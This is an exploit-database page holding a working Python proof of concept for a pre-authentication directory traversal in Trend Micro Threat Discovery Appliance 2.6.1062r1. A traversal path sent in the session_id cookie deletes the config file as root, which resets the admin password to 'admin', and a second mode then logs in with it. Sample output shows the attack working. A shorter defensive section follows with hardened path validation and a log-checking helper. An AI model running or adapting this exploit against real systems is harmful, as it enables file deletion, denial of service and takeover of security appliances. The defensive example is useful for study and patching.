Trend Micro Threat Discovery Appliance 2.6.1062r1 logoff.cgi Directory Traversal Exploit

Published: 20 Apr 2017. Reported by: mr_me. Type: zdt. Source: 0day.today.

Trend Micro Threat Discovery Appliance 2.6.1062r1 logoff.cgi Directory Traversal Vul

#!/usr/local/bin/python
"""
Trend Micro Threat Discovery Appliance <= 2.6.1062r1 logoff.cgi Directory Traversal Authentication Bypass Vulnerability
Found by: Steven Seeley of Source Incite & Roberto Suggi Liverani - @malerisch - http://blog.malerisch.net/ 
File: TDA_InstallationCD.2.6.1062r1.en_US.iso
sha1: 8da4604c92a944ba8f7744641bce932df008f9f9
Download: http://downloadcenter.trendmicro.com/index.php?regs=NABU&clk=latest&clkval=1787&lang_loc=1

Summary:
========

There exists a pre-authenticated directory traversal vulnerability that allows an attacker to delete any folder or file as root. 
This can result in an attacker causing a DoS or bypassing authentication.

Exploitation:
=============

An attacker can use this vulnerability to bypass authentication by resetting the default password back to 'admin'.

1. Delete the config file /opt/TrendMicro/MinorityReport/etc/igsa.conf
2. Wait for the server to be rebooted...

It is highly likely the server will be rebooted because the deletion of the config file causes a DoS condition whereby
nobody can even log in (since the MD5-hashed password is stored in the config file).

Notes:
======

- (Un)fortunately, we were not able to find a pre-authenticated way to reboot the server, hence requiring slight user interaction (or patience)
- No username required!

Example:
========

saturn:trend_micro_threat_discovery_logoff_auth_bypass mr_me$ ./poc.py 
(+) usage: ./poc.py <target> <option [reset][login]>
(+) eg: ./poc.py 172.16.175.123 reset
(+) eg: ./poc.py 172.16.175.123 login
saturn:trend_micro_threat_discovery_logoff_auth_bypass mr_me$ ./poc.py 172.16.175.123 login
(-) login failed
saturn:trend_micro_threat_discovery_logoff_auth_bypass mr_me$ ./poc.py 172.16.175.123 reset
(+) resetting the default password...
(+) success! now wait for a reboot...
saturn:trend_micro_threat_discovery_logoff_auth_bypass mr_me$ ./poc.py 172.16.175.123 login
(+) logged in...
(+) authenticated session_id: de685c4feec6d698f8165a8af8489df1

"""

import re
import os
import sys
import time
import requests
import threading

requests.packages.urllib3.disable_warnings()

if len(sys.argv) != 3:
    print "(+) usage: %s <target> <option [reset][login]>" % sys.argv[0]
    print "(+) eg: %s 172.16.175.123 reset" % sys.argv[0]
    print "(+) eg: %s 172.16.175.123 login" % sys.argv[0]
    sys.exit(-1)

t = sys.argv[1]
o = sys.argv[2]

bu = "https://%s/" % t
l_url = "%scgi-bin/logon.cgi" % bu
o_url = "%scgi-bin/logoff.cgi" % bu

if o.lower() == "login":
    # default password
    r = requests.post(l_url, data={ "passwd":"admin", "isCookieEnable":1 }, verify=False)
    if "frame.cgi" in r.text:
        print "(+) logged in..."
        match = re.search("session_id=(.*); path", r.headers['set-cookie'])
        if match:
            print "(+) authenticated session_id: %s" % match.group(1)
    else:
        print "(-) login failed"
elif o.lower() == "reset":
    print "(+) resetting the default password..."
    r = requests.get(o_url, cookies={"session_id":"../../../opt/TrendMicro/MinorityReport/etc/igsa.conf"}, verify=False)
    # causes an uninitialized free() vulnerability as well...
    if "Memory map" in r.text:
        print "(+) success! now wait for a reboot..."
else:
    print "(-) not a valid option!"

#  0day.today [2018-04-05]  #
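The PoC above shows the root cause: logoff.cgi takes the session_id cookie value and uses it to locate the session file to remove, without validating it, so a traversal sequence in the cookie reaches any file on the box. The following Python is an added example (not part of the advisory or of Trend Micro's code) contrasting that flawed path construction with a hardened version that allowlists the cookie format and confines the resolved path; the session directory name and the helper names are assumptions.

```python
import os
import re

# Constructed session store location for the example; the product's real
# session directory is not stated in the advisory.
SESSION_DIR = "/srv/example_sessions"

# The session ids shown in the advisory are 32 lowercase hex characters.
SESSION_ID_RE = re.compile(r"\A[0-9a-f]{32}\Z")


def session_path_vulnerable(session_dir, session_id):
    """Mirrors the flawed pattern: the cookie value is joined straight into
    a filesystem path, so '../' segments walk out of session_dir."""
    return os.path.normpath(os.path.join(session_dir, session_id))


def session_path_hardened(session_dir, session_id):
    """Allowlist the cookie format first, then confine the resolved path.
    Returns None when the value must be rejected (caller should just
    clear the cookie and refuse to touch the filesystem)."""
    if not SESSION_ID_RE.match(session_id):
        return None
    base = os.path.realpath(session_dir)
    candidate = os.path.realpath(os.path.join(base, session_id))
    # Second line of defence: the candidate must stay inside session_dir.
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def escapes_session_dir(session_dir, session_id):
    """True when the vulnerable construction resolves outside session_dir."""
    base = os.path.normpath(session_dir)
    resolved = session_path_vulnerable(session_dir, session_id)
    return os.path.commonpath([base, resolved]) != base


def suspicious_cookie(session_id):
    """Log-review helper: flags session_id cookie values that are not plain
    session ids (traversal sequences, separators, anything non-hex)."""
    return SESSION_ID_RE.match(session_id) is None
```

Running suspicious_cookie over the session_id values in web-server or proxy logs is a cheap way to spot attempts against an unpatched appliance.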

Vulners AI Score: 9.4 (High risk). EPSS: 0.92979.